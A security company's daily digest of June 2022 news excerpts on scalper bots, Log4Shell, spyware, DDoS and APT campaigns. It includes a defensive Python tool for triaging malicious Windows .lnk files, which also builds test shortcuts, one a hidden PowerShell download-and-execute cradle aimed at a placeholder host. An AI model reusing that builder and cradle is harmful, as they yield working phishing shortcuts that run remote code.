June 24, 2022

Fortify Security Team
Jun 24, 2022

Title: Scalper Bots out of Control in Israel, Selling State Appointments
Date Published: June 23, 2022

https://www.bleepingcomputer.com/news/security/scalper-bots-out-of-control-in-israel-selling-state-appointments/

Excerpt: “Out-of-control scalper bots have created havoc in Israel by registering public service appointments for various government services and then offering to sell them to disgruntled citizens.
The bot’s operators attempted to sell appointments for a range of government agencies for over $100, including passport renewal, the Israeli Ministry of Interior, the Ministry of Transport, National Insurance, Israel Post, and the Israeli state Electricity Company.”

Title: CISA: Log4Shell Exploits Still Being Used to Hack VMware Servers
Date Published: June 23, 2022

https://www.bleepingcomputer.com/news/security/cisa-log4shell-exploits-still-being-used-to-hack-vmware-servers/

Excerpt: “CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability. Attackers can exploit Log4Shell remotely on vulnerable servers exposed to local or Internet access to move laterally across networks until they gain access to internal systems containing sensitive data. After its disclosure in December 2021, multiple threat actors began scanning for and exploiting unpatched systems, including state-backed hacking groups from China, Iran, North Korea, and Turkey, as well as several access brokers commonly used by ransomware gangs.”

Title: Spyware Vendor Works With ISPs to Infect iOS and Android Users
Date Published: June 23, 2022

https://www.bleepingcomputer.com/news/security/spyware-vendor-works-with-isps-to-infect-ios-and-android-users/

Excerpt: “Google’s Threat Analysis Group (TAG) revealed today that RCS Labs, an Italian spyware vendor, has received help from some Internet service providers (ISPs) to infect Android and iOS users in Italy and Kazakhstan with commercial surveillance tools. RCS Labs is just one of more than 30 spyware vendors whose activity is currently tracked by Google, according to Google TAG analysts Benoit Sevens and Clement Lecigne. During attacks that used drive-by-downloads to infect multiple victims, the targets were prompted to install malicious apps (camouflaged as legitimate mobile carrier apps) to get back online after their Internet connection was cut with the help of their ISP.”

Title: Lithuania Warns of Rise in DDoS Attacks Against Government Sites
Date Published: June 23, 2022

https://www.bleepingcomputer.com/news/security/lithuania-warns-of-rise-in-ddos-attacks-against-government-sites/

Excerpt: “The National Cyber Security Center (NKSC) of Lithuania has issued a public warning about a steep increase in distributed denial of service (DDoS) attacks directed against public authorities in the country. DDoS is a special type of cyberattack that causes internet servers to be overwhelmed by a large number of requests and garbage traffic, rendering the hosted sites and services inaccessible for legitimate visitors and users. According to NKSC, due to these cyberattacks, Lithuania’s transportation agencies, financial institutions, and other large entities have experienced temporary service disruptions.”

Title: Malicious Windows ‘LNK’ Attacks Made Easy with New Quantum Builder
Date Published: June 23, 2022

https://www.bleepingcomputer.com/news/security/malicious-windows-lnk-attacks-made-easy-with-new-quantum-builder/

Excerpt: “Malware researchers have noticed a new tool that helps cybercriminals build malicious .LNK files to deliver payloads for the initial stages of an attack. LNKs are Windows shortcut files that can contain malicious code to abuse legitimate tools on the system, the so-called living-off-the-land binaries (LOLBins), such as PowerShell or the MSHTA that is used to execute Microsoft HTML Application (HTA) files. Due to this, LNKs are extensively used for malware distribution, especially in phishing campaigns, with some notable malware families currently using them being Emotet, Bumblebee, Qbot, and IcedID.”
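The LNK-as-LOLBin-launcher technique described in that excerpt can be triaged at scale by reading the shortcut's own metadata instead of executing it. The Python below is an added example for this digest, not code from BleepingComputer or from the Quantum builder: it parses the MS-SHLLINK header and StringData sections (target path, arguments, icon) and applies the heuristics a malware analyst would apply by hand: target is a LOLBin such as PowerShell or MSHTA, arguments contain a hidden-window or download-cradle marker, ShowCommand minimises the console, and the icon is borrowed from a different file. The two .lnk samples are constructed inside the block with a small builder; the host example.invalid is a placeholder, not a real indicator.

```python
import struct

# MS-SHLLINK header layout (offsets in bytes)
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData sections appear in this order, each present only if its LinkFlags bit is set
STRING_DATA = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
               (0x20, "arguments"), (0x40, "icon_location"))
SW_SHOWMINNOACTIVE = 7  # ShowCommand that starts the target minimised, common in malicious LNKs

LOLBINS = ("powershell", "pwsh", "mshta", "cmd.exe", "wscript", "cscript",
           "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec")
ARG_MARKERS = ("-enc", "-e ", "hidden", "bypass", "iex", "downloadstring",
               "http", "vbscript:", "javascript:", "-nop")


def parse_lnk(data: bytes) -> dict:
    """Decode ShowCommand and the StringData fields of a .lnk; skip IDList/LinkInfo by size."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a Shell Link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize counts itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    width = 2 if unicode else 1
    for bit, name in STRING_DATA:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, not bytes
        off += 2
        raw = data[off:off + count * width]
        off += count * width
        fields[name] = raw.decode("utf-16-le" if unicode else "cp1252", "replace")
    return fields


def suspicious_indicators(fields: dict) -> list:
    """Heuristic triage: reasons a parsed LNK looks like a LOLBin launcher."""
    reasons = []
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "").lower()
    icon = fields.get("icon_location", "").lower()
    for lolbin in LOLBINS:
        if lolbin in target:
            reasons.append(f"target is LOLBin {lolbin}")
            break
    hits = [m for m in ARG_MARKERS if m in args]
    if hits:
        reasons.append("suspicious arguments: " + ", ".join(hits))
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (console hidden from user)")
    # Weak signal on its own: legitimate shortcuts also use .ico/.dll icons.
    if icon and target and icon.rsplit("\\", 1)[-1] != target.rsplit("\\", 1)[-1]:
        reasons.append("icon taken from a different file than the target (icon spoofing)")
    return reasons


def build_lnk(relative_path: str, arguments: str = "", icon_location: str = "",
              show_command: int = 1) -> bytes:
    """Assemble a minimal Unicode .lnk for testing (constructed sample, not a capture)."""
    flags = IS_UNICODE | 0x08 | (0x20 if arguments else 0) | (0x40 if icon_location else 0)
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
              + bytes(36)                        # FileAttributes, 3 FILETIMEs, FileSize, IconIndex
              + struct.pack("<I", show_command)  # ShowCommand sits at offset 0x3C
              + bytes(12))                       # HotKey, Reserved1..3
    assert len(header) == LNK_HEADER_SIZE
    body = b""
    for value in (relative_path, arguments, icon_location):  # StringData order
        if value:
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    return header + body


# Constructed samples: a PowerShell download cradle dressed up as a document, and a plain shortcut.
MALICIOUS_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments="-nop -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage1.ps1')\"",
    icon_location=r"%SystemRoot%\System32\imageres.dll",
    show_command=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_lnk(relative_path=r"..\..\Program Files\Notepad++\notepad++.exe")

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        print(label, suspicious_indicators(parse_lnk(blob)))
```

On a mail gateway or in a sandbox the same `parse_lnk` plus `suspicious_indicators` pair runs over every .lnk pulled from an archive; the indicator list, rather than a single score, is what goes into the alert so an analyst can see which of the four signals fired.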

Title: June Windows Preview Updates Fix VPN, RDP, RRAS, and Wi-Fi Issues
Date Published: June 24, 2022

https://www.bleepingcomputer.com/news/microsoft/june-windows-preview-updates-fix-vpn-rdp-rras-and-wi-fi-issues/

Excerpt: “The optional Windows update previews released by Microsoft this week come with more than the regular performance improvements and bug fixes. Redmond published three cumulative updates as part of its scheduled June 2022 monthly “C” updates to allow customers to test upcoming fixes: KB5014668 (Windows 11), KB5014665 (Windows Server 2022), and KB5014669 (Windows 10, version 1809). However, as the company revealed on Thursday in the Windows health dashboard [1, 2, 3], the updates also address connectivity issues when using Wi-Fi hotspots after installing Windows updates released as part of the June 2022 Patch Tuesday.”

Title: How Companies are Prioritizing Infosec and Compliance
Date Published: June 24, 2022

https://www.helpnetsecurity.com/2022/06/24/companies-infosec-compliance-priorities/

Excerpt: “New research conducted by Enterprise Management Associates (EMA) examines the impact of the compliance budget on security strategy and priorities. It describes areas for which companies prioritize information security and compliance, which leaders control information security spending, how compliance has shifted the overall security strategy of the organization, and the solutions and tools on which organizations are focusing their technology spending. The findings cover three critical areas of an organization’s security and compliance posture: information security and IT audit and compliance, data security and data privacy, and security and compliance spending.”

Title: Chinese Tropic Trooper APT Spreads a Hacking Tool Laced with a Backdoor
Date Published: June 23, 2022

https://securityaffairs.co/wordpress/132545/hacking/tropic-trooper-apt-new-campaign.html

Excerpt: “Check Point Research uncovered an activity cluster with ties to China-linked APT Tropic Trooper (aka Earth Centaur, KeyBoy, and Pirate Panda) which involved the use of a previously undescribed loader (dubbed “Nimbda”) written in the Nim language. The Tropic Trooper APT has been active at least since 2012; it was first spotted by security experts at Trend Micro in 2015, when the threat actors targeted government ministries and heavy industries in Taiwan and the military in the Philippines. Nimbda works by injecting a piece of code into a launched notepad.exe process, which allows operators to start a three-tier infection chain. The final payload encoded in the image is TClient, which is a backdoor that was used by the Tropic Trooper APT group in past campaigns.”

Title: NSO Group Told Lawmakers that Pegasus Spyware was Used by at Least 5 European Countries
Date Published: June 23, 2022

https://securityaffairs.co/wordpress/132536/malware/nso-group-pegasus-5-eu-countries.html

Excerpt: “The controversial Israeli surveillance vendor NSO Group told the European Union lawmakers that its Pegasus spyware was used by at least five countries in the region. NSO Group’s General Counsel Chaim Gelfand admitted that the company had “made mistakes,” but that after the abuses of its software made the headlines it has canceled several contracts. In April, the Parliament set up a new inquiry committee investigating the use of Pegasus spyware and equivalent surveillance software used to spy on phones belonging to politicians, diplomats, and civil society members. The spyware was used to target several European leaders, including Spain’s Prime Minister Pedro Sánchez, and Spanish political groups, Hungary, and Poland.”

Title: Russia Steps Up Cyber-Espionage Against Ukraine Allies
Date Published: June 23, 2022

https://www.infosecurity-magazine.com/news/russia-cyberespionage-against/

Excerpt: “Russian state-backed hackers have conducted network penetration and espionage activities against 128 organizations in 42 countries allied to Ukraine since the start of the war, according to Microsoft. Aside from the US, which is Russia’s number one target, campaigns have also focused on Poland, which is where much military and humanitarian assistance is being coordinated, according to the tech giant’s president, Brad Smith. The Baltic countries as well as Denmark, Norway, Finland, Sweden, and Turkey have also been targets, with governments and foreign ministries in particular singled out, he claimed.”
